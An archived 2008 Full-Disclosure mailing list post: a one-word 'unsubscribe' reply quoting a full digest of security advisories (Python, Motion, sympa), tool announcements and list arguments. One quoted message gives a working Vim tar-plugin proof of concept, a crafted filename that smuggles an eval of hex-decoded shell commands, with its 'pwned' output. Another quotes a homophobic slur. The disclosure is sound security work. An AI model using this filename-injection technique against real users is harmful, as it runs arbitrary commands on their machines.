Full Disclosure mailing list archives

Re: Full-Disclosure Digest, Vol 41, Issue 3
From: badr muhyeddin <gigiyousef () hotmail com>
Date: Wed, 2 Jul 2008 14:15:35 +0300


> From: full-disclosure-request () lists grok org uk
> Subject: Full-Disclosure Digest, Vol 41, Issue 3
> To: full-disclosure () lists grok org uk
> Date: Wed, 2 Jul 2008 12:00:01 +0100
>
> Send Full-Disclosure mailing list submissions to
> full-disclosure () lists grok org uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request () lists grok org uk
>
> You can reach the person managing the list at
> full-disclosure-owner () lists grok org uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.
>
>
> Today's Topics:
>
> 1. [ GLSA 200807-01 ] Python: Multiple integer overflows (Tobias Heinlein)
> 2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code (Tobias Heinlein)
> 3. Alphanumeric shellcode improvements (Berend-Jan Wever)
> 4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability (mrdkaaa () stream cz)
> 5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1 (Jan Minar)
> 6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of service (Steve Kemp)
> 7. [tool] ratproxy - passive web application security assessment tool (Michal Zalewski)
> 8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability (Filipe Balestra)
> 9. Re: Full-Disclosure? introducing lul-disclosure. (Tonnerre Lombard)
> 10. Deepsec Talks 2007 are online - registration for 2008 is open (DeepSec 2008)
> 11. Re: Full-Disclosure? introducing lul-disclosure. (root)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Tue, 01 Jul 2008 13:51:43 +0200
> From: Tobias Heinlein <keytoaster () gentoo org>
> Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer
> overflows
> To: gentoo-announce () gentoo org
> Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
> security-alerts () linuxsecurity com
> Message-ID: <486A1A4F.1080404 () gentoo org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200807-01
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: Python: Multiple integer overflows
> Date: July 01, 2008
> Bugs: #216673, #217221
> ID: 200807-01
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple integer overflows may allow for Denial of Service.
>
> Background
> ==========
>
> Python is an interpreted, interactive, object-oriented programming
> language.
>
> Affected packages
> =================
>
> -------------------------------------------------------------------
>      Package          /  Vulnerable  /                  Unaffected
> -------------------------------------------------------------------
>   1  dev-lang/python      < 2.4.4-r13                 *>= 2.3.6-r6
>                                                        >= 2.4.4-r13
>
> Description
> ===========
>
> Multiple vulnerabilities were discovered in Python:
>
> * David Remahl reported multiple integer overflows in the file
> imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).
> This issue is due to an incomplete fix for CVE-2007-4965.
>
> * Justin Ferguson discovered that an integer signedness error in the
> zlib extension module might trigger insufficient memory allocation
> and a buffer overflow via a negative signed integer (CVE-2008-1721).
>
> * Justin Ferguson discovered that insufficient input validation in
> the PyString_FromStringAndSize() function might lead to a buffer
> overflow (CVE-2008-1887).
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities to cause a Denial
> of Service or possibly the remote execution of arbitrary code with the
> privileges of the user running Python.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> The imageop module is no longer built in the unaffected versions.
>
> All Python 2.3 users should upgrade to the latest version:
>
> # emerge --sync
> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"
>
> All Python 2.4 users should upgrade to the latest version:
>
> # emerge --sync
> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"
>
> References
> ==========
>
> [ 1 ] CVE-2008-1679
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
> [ 2 ] CVE-2008-1721
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
> [ 3 ] CVE-2008-1887
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200807-01.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security () gentoo org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 197 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin
>
> ------------------------------
>
> Message: 2
> Date: Tue, 01 Jul 2008 13:59:36 +0200
> From: Tobias Heinlein <keytoaster () gentoo org>
> Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of
> arbitrary code
> To: gentoo-announce () gentoo org
> Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
> security-alerts () linuxsecurity com
> Message-ID: <486A1C28.3010409 () gentoo org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200807-02
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: Motion: Execution of arbitrary code
> Date: July 01, 2008
> Bugs: #227053
> ID: 200807-02
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple vulnerabilities in Motion might result in the execution of
> arbitrary code.
>
> Background
> ==========
>
> Motion is a program that monitors the video signal from one or more
> cameras and is able to detect motions.
>
> Affected packages
> =================
>
> -------------------------------------------------------------------
>      Package             /  Vulnerable  /               Unaffected
> -------------------------------------------------------------------
>   1  media-video/motion      < 3.2.10.1                >= 3.2.10.1
>
> Description
> ===========
>
> Nico Golde reported an off-by-one error within the read_client()
> function in the webhttpd.c file, leading to a stack-based buffer
> overflow. Stefan Cornelius (Secunia Research) reported a boundary error
> within the same function, also leading to a stack-based buffer
> overflow. Both vulnerabilities require that the HTTP Control interface
> is enabled.
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities by sending an
> overly long or specially crafted request to a vulnerable Motion HTTP
> control interface, possibly resulting in the execution of arbitrary
> code with the privileges of the motion user.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All Motion users should upgrade to the latest version:
>
> # emerge --sync
> # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"
>
> References
> ==========
>
> [ 1 ] CVE-2008-2654
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200807-02.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security () gentoo org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 197 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin
>
> ------------------------------
>
> Message: 3
> Date: Tue, 1 Jul 2008 14:18:34 +0200
> From: "Berend-Jan Wever" <berendjanwever () gmail com>
> Subject: [Full-disclosure] Alphanumeric shellcode improvements
> To: full-disclosure () lists grok org uk
> Message-ID:
> <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9 () mail gmail com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi all,
>
> I've not had as much opportunity in the last three years to contribute, but
> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,
> the upcoming new version of my alphanumeric shellcode encoder:
> * I've reduced the size of the mixedcase ascii decoder:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a lowercase ascii decoder:
> http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a mixedcase ascii decoder for x64:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64
> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and
> some documentation.
>
> Cheers,
> SkyLined
>
> --
> Berend-Jan "SkyLined" Wever
> Email & Live messenger: berendjanwever () gmail com
> --
> 'The historical abuses of new data occurred between the time that a few
> people learned the important thing and the time when that important thing
> became general knowledge. To the Gowachin and to BuSab it was the "Data
> Gap," a source of constant danger.'
> -- Frank Herbert, 'The Dosadi Experiment'
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html
>
> ------------------------------
>
> Message: 4
> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
> From: mrdkaaa () stream cz
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
> Escalation Vulnerability
> To: full-disclosure () lists grok org uk
> Message-ID: <4.4-28953-1047754371-1214923194 () stream cz>
> Content-Type: text/plain; charset="us-ascii"
>
> This vulnerability is at least two years old. Anyway, what's the point of releasing
> a security advisory for a vendor well known to never going to patch it?
>
>
>
> ------------------------------
>
> Message: 5
> Date: Tue, 1 Jul 2008 20:36:29 +0100
> From: "Jan Minar" <rdancer () rdancer org>
> Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully
> Patched Vim 7.1
> To: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
> vim_dev () googlegroups com, "Bram Moolenaar" <Bram () moolenaar net>
> Cc: bugs () vim org
> Message-ID:
> <6edf76c20807011236t7f96955h924c2692705b6ff4 () mail gmail com>
> Content-Type: text/plain; charset=UTF-8
>
> On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:
> >
> > Jan Minar wrote:
> >
> >> 1. Summary
> >> Product : Vim -- Vi IMproved
> >> Version : Tested with 7.1.314 and 6.4
> >> Impact : Arbitrary code execution
> >> Wherefrom: Local and remote
> >> Original : http://www.rdancer.org/vulnerablevim.html
> >>
> >> Improper quoting in some parts of Vim written in the Vim Script can lead to
> >> arbitrary code execution upon opening a crafted file.
> >
> > Note that version 7.1.314, as reported in the Summary, does not have
> > most of the reported problems. The problems in the plugins have also
> > been fixed, this requires updating the runtime files. Information about
> > that can be found at http://www.vim.org/runtime.php
>
> I do apologize: as written in the advisory, the version I worked with
> was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
> updated the advisory at http://www.rdancer.org/vulnerablevim.html .
>
> Thanks to Bram for all the good work.
>
> 7.2a.10 with updated runtime is still vulnerable to the zipplugin
> attack, and an updated tarplugin attack:
>
> -------------------------------------------
> -------- Test results below ---------------
> -------------------------------------------
> filetype.vim
> strong : EXPLOIT FAILED
> weak : EXPLOIT FAILED
> tarplugin : EXPLOIT FAILED
> tarplugin.updated: VULNERABLE
> zipplugin : VULNERABLE
> xpm.vim
> xpm : EXPLOIT FAILED
> xpm2 : EXPLOIT FAILED
> remote : EXPLOIT FAILED
> gzip_vim : EXPLOIT FAILED
> netrw : EXPLOIT FAILED
>
> The original tarplugin exploit now produces a string of telling error messages:
>
> /bin/bash: so%: command not found
> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
> Cannot open: No such file or directory
> tar: Error is not recoverable: exiting now
> /bin/bash: retu: command not found
> /bin/bash: bar.tar|retu|'bar.tar: command not found
>
> It's easy to see that it is still possible to execute arbitrary shell commands.
>
> $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
>
> 136 if tarfile =~# '\.\(gz\|tgz\)$'
> 137 " call Decho("1: exe silent r! gzip -d -c
> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
> *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." |
> ".g:tar_cmd." -".g:tar_browseoptions." - "
> 139 elseif tarfile =~# '\.lrp'
> 140 " call Decho("2: exe silent r! cat --
> ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd."
> -".g:tar_browseoptions." - ")
> *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c
> -|".g:tar_cmd." -".g:tar_browseoptions." - "
> 142 elseif tarfile =~# '\.bz2$'
> 143 " call Decho("3: exe silent r! bzip2 -d -c
> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
> *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |
> ".g:tar_cmd." -".g:tar_browseoptions." - "
> 145 else
> 146 " call Decho("4: exe silent r! ".g:tar_cmd."
> -".g:tar_browseoptions." ".s:Escape(tarfile))
> **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions."
> ".s:Escape(tarfile)
> [...]
> 444 fun s:Escape(name)
> 445 " shellescape() was added by patch 7.0.111
> 446 if exists("*shellescape")
> 447 let qnameq= shellescape(a:name)
> 448 else
> 449 let qnameq= g:tar_shq . a:name . g:tar_shq
> 450 endif
> 451 return qnameq
> 452 endfun
>
> (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
>
> (**) tar(1) allows arbitrary command execution via options ``--to-command'',
> and ``--use-compress-program''.
>
>
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
> xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.
>
>
>
> ------------------------------
>
> Message: 6
> Date: Tue, 1 Jul 2008 21:25:39 +0100
> From: Steve Kemp <skx () debian org>
> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages
> fix denial of service
> To: debian-security-announce () lists debian org
> Message-ID: <20080701202539.GA32605 () steve org uk>
> Content-Type: text/plain; charset=us-ascii
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - ------------------------------------------------------------------------
> Debian Security Advisory DSA-1600-1 security () debian org
> http://www.debian.org/security/ Steve Kemp
> July 01, 2008 http://www.debian.org/security/faq
> - ------------------------------------------------------------------------
>
> Package : sympa
> Vulnerability : dos
> Problem type : remote
> Debian-specific: no
> CVE Id(s) : CVE-2008-1648
> Debian Bug : 475163
>
> It was discovered that sympa, a modern mailing list manager, would
> crash when processing certain types of malformed messages.
>
> For the stable distribution (etch), this problem has been fixed in version
> 5.2.3-1.2+etch1.
>
> For the unstable distribution (sid), this problem has been fixed in
> version 5.3.4-4.
>
> We recommend that you upgrade your sympa package.
>
>
> Upgrade instructions
> - --------------------
>
> wget url
> will fetch the file for you
> dpkg -i file.deb
> will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
> will update the internal database
> apt-get upgrade
> will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>
>
> Debian GNU/Linux 4.0 alias etch
> - -------------------------------
>
> Source archives:
>
> These files will probably be moved into the stable distribution on its next
> update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce () lists debian org
> Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S
> 6REh7OX9zxqgWYGHqQWtEpQ=
> =ANTa
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------
>
> Message: 7
> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
> From: Michal Zalewski <lcamtuf () dione cc>
> Subject: [Full-disclosure] [tool] ratproxy - passive web application
> security assessment tool
> To: bugtraq () securityfocus com, websecurity () webappsec org
> Cc: full-disclosure () lists grok org uk
> Message-ID: <Pine.LNX.4.64.0807012124130.17434 () dione cc>
> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
> Hi all,
>
> I am happy to announce that we've just open sourced ratproxy - a free,
> passive web security assessment tool. This utility is designed to
> transparently analyze legitimate, browser-driven interactions with tested
> web applications - and automatically pinpoint, annotate, and prioritize
> potential flaws or areas of concern on the fly.
>
> The proxy analyzes problems such as cross-site script inclusion threats,
> insufficient cross-site request forgery defenses, caching issues,
> potentially unsafe cross-domain code inclusion schemes and information
> leakage scenarios, and much more.
>
> For a detailed discussion of the utility, please visit:
> http://code.google.com/p/ratproxy/wiki/RatproxyDoc
>
> Source code is available at:
> http://code.google.com/p/ratproxy/downloads/list
>
> And finally, screenshot of a sample report can be found here:
> http://lcamtuf.coredump.cx/ratproxy-screen.png
>
> The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since
> it is in beta, there might be some kinks to be ironed out, and not all web
> technologies might be properly accounted for. Feedback is appreciated.
>
> Please keep in mind that the proxy is meant to highlight interesting
> patterns in web applications; a further analysis by a security
> professional is required to interpret the significance of results for a
> particular platform.
>
> Cheers,
> /mz
>
>
>
> ------------------------------
>
> Message: 8
> Date: Wed, 2 Jul 2008 02:19:01 -0300
> From: "Filipe Balestra" <filipe () balestra com br>
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
> Escalation Vulnerability
> To: <full-disclosure () lists grok org uk>
> Message-ID: <BEDD65A8CCD54B3BAA75664A0D440A93 () 123PC>
> Content-Type: text/plain; charset="iso-8859-1"
>
> mrdkaaa,
>
> are you saying that this vulnerability is not new to the public?
>
> The program phgrafx had some vulnerabilities published, but this one is not the same of any other that I can find in securityfocus. One program can have a lot of vulnerabilities :)
>
> But yes, this vulnerability is at least four years old, but was not public.
>
> Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?
>
> p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.
>
> Cheers,
>
> Filipe Alcarde Balestra
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html
>
> ------------------------------
>
> Message: 9
> Date: Wed, 2 Jul 2008 08:29:43 +0200
> From: Tonnerre Lombard <tonnerre.lombard () sygroup ch>
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
> lul-disclosure.
> To: staff () lul-disclosure net
> Cc: full-disclosure () lists grok org uk
> Message-ID: <20080702082943.2811aba5 () wssyg117 sygroup-int ch>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Salut,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant
> > steal your money or eat your lunches? Where you can freely submit
> > lulz to be published? Where Theo's defeat and denial are brought to
> > light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between
> local and remote root vulnerabilities? (The local root exploit for
> obsd4 which is published on that site contains a patch to increment the
> count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33 Güterstrasse 86
> Fax:+41 61 383 14 67 4053 Basel
> Web:www.sygroup.ch tonnerre.lombard () sygroup ch
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 835 bytes
> Desc: not available
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin
>
> ------------------------------
>
> Message: 10
> Date: Tue, 01 Jul 2008 21:47:36 +0200
> From: DeepSec 2008 <deepsec () deepsec net>
> Subject: [Full-disclosure] Deepsec Talks 2007 are online -
> registration for 2008 is open
> To: full-disclosure () lists grok org uk
> Message-ID: <486A89D8.2000303 () deepsec net>
> Content-Type: text/plain; charset=UTF-8; format=flowed
>
> Dear Madam, dear Sir,
>
> DeepSec Vienna, the annual In-Depth Security Conference has opened
> online registrations for 2008. Registrations will receive a discount
> of 5% off the regular fees until August 31st if you use the following
> promotional code: earlybird-L4KZIEUE on our online registration form
> at https://deepsec.net/register/
>
> Videos from 2007 are online:
>
> Also we are happy to announce that talks from last years conference
> are online. Listen to last years talks in full length at:
> http://video.google.com/videosearch?q=deepsec&sitesearch=#
>
> Call for Papers still Open for two weeks:
>
> If you have some good ideas for a Talk at the conference and haven't
> decided yet to submit we encourage you to do so now. We still accept
> submissions at https://deepsec.net/cfp/ or via e-mail to:
> cfp () deepsec net
>
>
> We hope to hear from you and of course to meet in Vienna in November!
>
> Best Regards,
>
> Paul Böhm,
> René Pfeiffer,
> Michael Kafka
> DeepSec GmbH
>
> --
> DeepSec In-Depth Security Conference
> November 11th to 14th 2008, Vienna, Austria
> https://deepsec.net/
>
>
>
> ------------------------------
>
> Message: 11
> Date: Wed, 02 Jul 2008 04:08:38 -0300
> From: root <root_ () fibertel com ar>
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
> lul-disclosure.
> To: staff () lul-disclosure net
> Cc: full-disclosure () lists grok org uk
> Message-ID: <486B2976.8000708 () fibertel com ar>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> You couldn't do the remote exploit even with a google video documenting
> it step by step.
> More like fail-disclosure.
>
> staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal
> > your money or eat your lunches? Where you can freely submit lulz to be
> > published? Where Theo's defeat and denial are brought to light? Wait no
> > more!
> >
> > http://lul-disclosure.net/
> >
> > WhiteHat? BlackHat? We are lulzhat.
> >
> > Fuck you and your hats.
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 41, Issue 3
> **********************************************

unsubscribe
 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
